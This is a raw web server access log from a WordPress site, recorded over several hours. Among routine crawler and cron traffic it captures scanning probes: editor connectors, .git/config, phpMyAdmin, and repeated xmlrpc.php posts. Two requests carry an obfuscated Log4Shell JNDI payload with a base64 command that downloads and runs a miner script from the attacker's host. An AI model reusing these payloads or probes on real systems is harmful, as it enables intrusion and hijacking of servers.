124.236.77.12 - - [28/Oct/2025:00:36:12 +0800] "GET /master/ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:12 +0800] "GET /sandfckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:13 +0800] "GET /oldbackup/fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:14 +0800] "GET /bak/ckfinder/core/connector/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8991 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:15 +0800] "GET /sdws.fckeditor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:15 +0800] "GET /netcms.web/editor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
124.236.77.12 - - [28/Oct/2025:00:36:16 +0800] "GET /editor/editor/filemanager/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder= HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
36.133.115.36 - - [28/Oct/2025:00:39:01 +0800] "POST /wp-cron.php?doing_wp_cron=1761583141.6150600910186767578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [28/Oct/2025:00:39:01 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Oct/2025:00:43:33 +0800] "POST /wp-cron.php?doing_wp_cron=1761583413.4977879524230957031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.65.193.205 - - [28/Oct/2025:00:43:33 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [28/Oct/2025:00:44:28 +0800] "POST /wp-cron.php?doing_wp_cron=1761583468.1332581043243408203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
180.153.236.18 - - [28/Oct/2025:00:44:28 +0800] "GET /robots.txt HTTP/1.1" 200 190 "http://cqqizhou.com/robots.txt" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [28/Oct/2025:00:52:55 +0800] "POST /wp-cron.php?doing_wp_cron=1761583975.6015639305114746093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
34.34.132.221 - - [28/Oct/2025:00:52:55 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.5"
36.133.115.36 - - [28/Oct/2025:01:35:11 +0800] "POST /wp-cron.php?doing_wp_cron=1761586511.9477241039276123046875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.130.3.122 - - [28/Oct/2025:01:35:12 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Oct/2025:01:47:53 +0800] "POST /wp-cron.php?doing_wp_cron=1761587273.6674950122833251953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.190.48.14 - - [28/Oct/2025:01:47:53 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"
36.133.115.36 - - [28/Oct/2025:01:52:13 +0800] "POST /wp-cron.php?doing_wp_cron=1761587533.0832440853118896484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
172.176.156.162 - - [28/Oct/2025:01:52:13 +0800] "HEAD /wordpress HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:13 +0800] "HEAD / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:14 +0800] "HEAD /wp HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:15 +0800] "HEAD /bc HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:16 +0800] "HEAD /bk HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:16 +0800] "HEAD /backup HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:17 +0800] "HEAD /old HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:18 +0800] "HEAD /new HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:18 +0800] "HEAD /news/ HTTP/1.1" 200 0 "http://cqqizhou.com/new" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:19 +0800] "HEAD /main HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:20 +0800] "HEAD /home HTTP/1.1" 301 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
172.176.156.162 - - [28/Oct/2025:01:52:20 +0800] "HEAD / HTTP/1.1" 200 0 "http://cqqizhou.com/home" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
36.133.115.36 - - [28/Oct/2025:01:53:59 +0800] "POST /wp-cron.php?doing_wp_cron=1761587639.5859119892120361328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.108.121 - - [28/Oct/2025:01:53:59 +0800] "HEAD /manage/account/login HTTP/1.1" 404 0 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.3 Safari/533.19.4"
36.133.115.36 - - [28/Oct/2025:02:12:17 +0800] "POST /wp-cron.php?doing_wp_cron=1761588737.2788290977478027343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.157.254 - - [28/Oct/2025:02:12:17 +0800] "GET /.git/config HTTP/1.1" 404 8990 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/74.0.3729.155 Mobile/15E148 Safari/605.1"
36.133.115.36 - - [28/Oct/2025:02:17:10 +0800] "POST /wp-cron.php?doing_wp_cron=1761589030.5033099651336669921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
175.6.217.4 - - [28/Oct/2025:02:17:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
175.6.217.4 - - [28/Oct/2025:02:17:11 +0800] "GET / HTTP/1.1" 200 33467 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [28/Oct/2025:02:19:48 +0800] "POST /wp-cron.php?doing_wp_cron=1761589188.4361879825592041015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
138.36.155.253 - - [28/Oct/2025:02:19:48 +0800] "GET /robots.txt HTTP/1.0" 200 378 "-" "xfa1"
36.133.115.36 - - [28/Oct/2025:02:24:44 +0800] "POST /wp-cron.php?doing_wp_cron=1761589484.0592329502105712890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
59.125.102.142 - - [28/Oct/2025:02:24:44 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0"
36.133.115.36 - - [28/Oct/2025:02:33:31 +0800] "POST /wp-cron.php?doing_wp_cron=1761590011.2015271186828613281250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
44.203.250.145 - - [28/Oct/2025:02:33:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
143.110.254.147 - - [28/Oct/2025:02:46:46 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0"
36.133.115.36 - - [28/Oct/2025:02:51:01 +0800] "POST /wp-cron.php?doing_wp_cron=1761591061.1381630897521972656250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
93.174.93.12 - - [28/Oct/2025:02:51:01 +0800] "GET / HTTP/1.0" 301 0 "-" "Mozilla/5.0 (X11; CrOS aarch64 12239.67.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.102 Safari/537.36"
36.133.115.36 - - [28/Oct/2025:02:56:40 +0800] "POST /wp-cron.php?doing_wp_cron=1761591400.8144481182098388671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.163.15.130 - - [28/Oct/2025:02:56:40 +0800] "GET /portal/redlion HTTP/1.1" 404 8989 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [28/Oct/2025:03:04:31 +0800] "POST /wp-cron.php?doing_wp_cron=1761591871.8637349605560302734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
134.209.152.133 - - [28/Oct/2025:03:04:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"
180.153.236.136 - - [28/Oct/2025:03:12:31 +0800] "GET / HTTP/1.1" 200 33931 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [28/Oct/2025:03:17:57 +0800] "POST /wp-cron.php?doing_wp_cron=1761592677.4551730155944824218750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [28/Oct/2025:03:17:57 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [28/Oct/2025:03:21:15 +0800] "POST /wp-cron.php?doing_wp_cron=1761592875.7478699684143066406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
123.160.221.137 - - [28/Oct/2025:03:21:16 +0800] "GET / HTTP/1.1" 200 41369 "-" "curl/7.64.1"
36.133.115.36 - - [28/Oct/2025:03:21:52 +0800] "POST /wp-cron.php?doing_wp_cron=1761592912.7955069541931152343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
123.160.223.73 - - [28/Oct/2025:03:21:52 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
123.160.223.73 - - [28/Oct/2025:03:22:05 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.133.115.36 - - [28/Oct/2025:03:29:29 +0800] "POST /wp-cron.php?doing_wp_cron=1761593369.9409821033477783203125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
113.141.85.179 - - [28/Oct/2025:03:29:29 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
113.141.85.179 - - [28/Oct/2025:03:29:30 +0800] "GET / HTTP/1.1" 200 33931 "http://36.133.115.36" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36"
36.133.115.36 - - [28/Oct/2025:03:29:53 +0800] "POST /wp-cron.php?doing_wp_cron=1761593393.1994500160217285156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.133.147.113 - - [28/Oct/2025:03:29:53 +0800] "GET / HTTP/1.1" 301 5 "-" "python-requests/2.32.4"
43.133.147.113 - - [28/Oct/2025:03:29:53 +0800] "GET / HTTP/1.1" 200 33931 "-" "python-requests/2.32.4"
36.133.115.36 - - [28/Oct/2025:03:31:33 +0800] "POST /wp-cron.php?doing_wp_cron=1761593493.9388210773468017578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
149.86.227.16 - - [28/Oct/2025:03:31:33 +0800] "GET /t%28%27$%7B$%7Benv:NaN:-j%7Dndi$%7Benv:NaN:-:%7D$%7Benv:NaN:-l%7Ddap$%7Benv:NaN:-:%7D//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z%7D%27%29 HTTP/1.1" 301 5 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z}')"
149.86.227.16 - - [28/Oct/2025:03:31:34 +0800] "GET /t%28%27%7B%7Benv:NaN:-j%7Dndi%7Benv:NaN:-:%7D%7Benv:NaN:-l%7Ddap%7Benv:NaN:-:%7D/149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z HTTP/1.1" 404 31381 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//149.86.227.16:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwOi8vMTQ5Ljg2LjIyNy4xNi80dGhlcG9vbF9taW5lci5zaCB8IGJhc2ggLXM7ICBleHBvcnQgSE9NRT0vdG1wOyB3Z2V0IC1xTy0gaHR0cDovLzE0OS44Ni4yMjcuMTYvNHRoZXBvb2xfbWluZXIuc2ggfCBiYXNoIC1z}')"
36.133.115.36 - - [28/Oct/2025:03:40:40 +0800] "POST /wp-cron.php?doing_wp_cron=1761594040.8264729976654052734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.242.254.186 - - [28/Oct/2025:03:40:40 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0"
36.133.115.36 - - [28/Oct/2025:04:17:31 +0800] "POST /wp-cron.php?doing_wp_cron=1761596251.1385440826416015625000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
128.199.173.212 - - [28/Oct/2025:04:17:31 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
36.133.115.36 - - [28/Oct/2025:04:35:45 +0800] "POST /wp-cron.php?doing_wp_cron=1761597345.8649120330810546875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
94.74.191.2 - - [28/Oct/2025:04:35:45 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
94.74.191.2 - - [28/Oct/2025:04:35:49 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 31381 "http://36.133.115.36:80/cgi-bin/luci/;stok=/locale" "-"
36.133.115.36 - - [28/Oct/2025:04:56:30 +0800] "POST /wp-cron.php?doing_wp_cron=1761598590.5810539722442626953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.198.154.245 - - [28/Oct/2025:04:56:30 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"
36.133.115.36 - - [28/Oct/2025:05:10:08 +0800] "POST /wp-cron.php?doing_wp_cron=1761599408.6855549812316894531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.171.207.0 - - [28/Oct/2025:05:10:08 +0800] "GET /wp-sitemap.xml HTTP/1.1" 501 253 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
36.133.115.36 - - [28/Oct/2025:05:21:15 +0800] "POST /wp-cron.php?doing_wp_cron=1761600075.3661758899688720703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.49.231.7 - - [28/Oct/2025:05:21:15 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
49.49.231.7 - - [28/Oct/2025:05:21:16 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
36.133.115.36 - - [28/Oct/2025:05:28:25 +0800] "POST /wp-cron.php?doing_wp_cron=1761600505.2440030574798583984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
49.49.231.7 - - [28/Oct/2025:05:28:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
49.49.231.7 - - [28/Oct/2025:05:28:28 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
36.133.115.36 - - [28/Oct/2025:05:35:03 +0800] "POST /wp-cron.php?doing_wp_cron=1761600903.7746469974517822265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
212.146.131.11 - - [28/Oct/2025:05:35:03 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
42.83.147.54 - - [28/Oct/2025:05:48:37 +0800] "GET / HTTP/1.1" 200 33931 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)Chrome/74.0.3729.169 Safari/537.36"
36.133.115.36 - - [28/Oct/2025:05:58:32 +0800] "POST /wp-cron.php?doing_wp_cron=1761602312.4153649806976318359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.249.69.165 - - [28/Oct/2025:05:58:32 +0800] "GET /2152017497 HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [28/Oct/2025:06:12:47 +0800] "POST /wp-cron.php?doing_wp_cron=1761603167.3571228981018066406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
158.247.243.94 - - [28/Oct/2025:06:12:47 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0"
36.133.115.36 - - [28/Oct/2025:06:51:35 +0800] "POST /wp-cron.php?doing_wp_cron=1761605495.6523420810699462890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
185.125.27.181 - - [28/Oct/2025:06:51:35 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"
36.133.115.36 - - [28/Oct/2025:07:02:21 +0800] "POST /wp-cron.php?doing_wp_cron=1761606141.7752699851989746093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
92.205.25.52 - - [28/Oct/2025:07:02:21 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0"
116.179.32.163 - - [28/Oct/2025:07:05:26 +0800] "GET /portfolio/%E5%86%B7%E8%BD%A7%E5%8D%B7/ HTTP/1.1" 200 22071 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [28/Oct/2025:07:19:36 +0800] "POST /wp-cron.php?doing_wp_cron=1761607176.4388179779052734375000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
213.209.143.66 - - [28/Oct/2025:07:19:36 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [28/Oct/2025:07:26:18 +0800] "POST /wp-cron.php?doing_wp_cron=1761607578.4938619136810302734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
66.249.68.64 - - [28/Oct/2025:07:26:18 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.68.70 - - [28/Oct/2025:07:26:19 +0800] "GET /news/page/2/ HTTP/1.1" 200 17950 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
36.133.115.36 - - [28/Oct/2025:07:29:22 +0800] "POST /wp-cron.php?doing_wp_cron=1761607762.0313038825988769531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
194.233.81.119 - - [28/Oct/2025:07:29:22 +0800] "POST /xmlrpc.php HTTP/1.1" 200 217 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"
182.253.20.52 - - [28/Oct/2025:07:31:04 +0800] "GET /phpMyAdmin-latest-english/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:04 +0800] "GET /program/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:04 +0800] "GET /phpMyAdmin-latest-all-languages/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:05 +0800] "GET /phpMyAdmin1/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
182.253.20.52 - - [28/Oct/2025:07:31:05 +0800] "GET /mysql/pMA/index.php?lang=en HTTP/1.1" 404 47 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
